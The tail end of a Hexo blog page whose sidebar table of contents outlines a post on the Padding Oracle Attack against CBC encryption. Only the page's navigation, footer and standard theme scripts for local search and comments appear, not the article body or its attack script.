              <a href="/2018/11/19/CBC-reverse/" rel="prev" title="CBC字节反转攻击原理">
                CBC字节反转攻击原理 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC80MDk0OC8xNzQ3Mw=="></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://img.jsqq.net/uploads/allimg/150111/1_150111080328_19.jpg"
               alt="暮沉沉" />
          <p class="site-author-name" itemprop="name">暮沉沉</p>
           
              <p class="site-description motion-element" itemprop="description">一些笔记和记录</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">27</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">21</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">35</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://xiaoxiaowensheng.github.io" title="小小文生" target="_blank">小小文生</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://teagle.top" title="楼兰" target="_blank">楼兰</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Padding-Oracle-Attack"><span class="nav-number">1.</span> <span class="nav-text">Padding Oracle Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、基础知识"><span class="nav-number">1.1.</span> <span class="nav-text">一、基础知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CBC密码分组模式"><span class="nav-number">1.1.1.</span> <span class="nav-text">CBC密码分组模式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#填充规则"><span class="nav-number">1.1.2.</span> <span class="nav-text">填充规则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过程巩固"><span class="nav-number">1.1.3.</span> <span class="nav-text">过程巩固</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、Padding-Oracle-Attack攻击原理"><span class="nav-number">1.2.</span> <span class="nav-text">二、Padding Oracle Attack攻击原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击前提："><span class="nav-number">1.2.1.</span> <span class="nav-text">攻击前提：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#服务器的处理与返回"><span class="nav-number">1.2.2.</span> <span class="nav-text">服务器的处理与返回</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#如何才能找出正确的中间值"><span class="nav-number">1.2.3.</span> <span class="nav-text">如何才能找出正确的中间值</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、实例"><span class="nav-number">1.3.</span> <span class="nav-text">三、实例</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#主要功能："><span class="nav-number">1.3.1.</span> <span class="nav-text">主要功能：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#页面代码"><span class="nav-number">1.3.2.</span> <span class="nav-text">页面代码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击脚本"><span class="nav-number">1.3.3.</span> <span class="nav-text">攻击脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考资料"><span class="nav-number">1.4.</span> <span class="nav-text">参考资料</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">暮沉沉</span>

  
</div>



<!--  <div class="powered-by">由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动</div>
-->
  <!-- <span class="post-meta-divider">|</span>
-->
  <div class="theme-info">
    <div class="powered-by"></div>
      <span class="post-count">博客全站共22.1k字</span>
  </div>  


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  








  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

</body>
</html>
